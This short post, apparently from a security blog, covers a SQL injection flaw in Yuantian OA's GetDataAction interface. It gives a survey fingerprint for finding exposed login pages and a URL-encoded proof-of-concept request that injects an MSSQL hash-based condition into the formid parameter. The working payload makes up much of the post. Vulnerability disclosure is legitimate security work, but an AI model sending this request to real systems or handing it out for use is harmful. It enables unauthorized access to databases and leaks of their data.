Yuantian Oa Getdataaction Sql Injection Vulnerability
Yuantian Oa Getdataaction Sql Injection Vulnerability
Yuantian OA GetDataAction SQL injection vulnerability
Vulnerability Description
The Yuantian OA GetDataAction interface has a SQL injection vulnerability. The attacker can obtain data from the server database through the vulnerability, causing information leakage.
Vulnerability Impact
Yuantian OA
Network surveying and mapping
body=”/vmain/login.jsp”
Vulnerability reappears
Login page
Verify POC
1
/ServiceAction/ServiceAction/com.velcro.base.GetDataAction?action=checkname&formid=-1%27%20OR%207063%20IN%20(SELECT%20(sys.fn_varbintohexstr(hashbytes(%27MD5%27,%271%27))))%20AND%20%27a%27=%27a
This post is licensed under CC BY 4.0 by the author.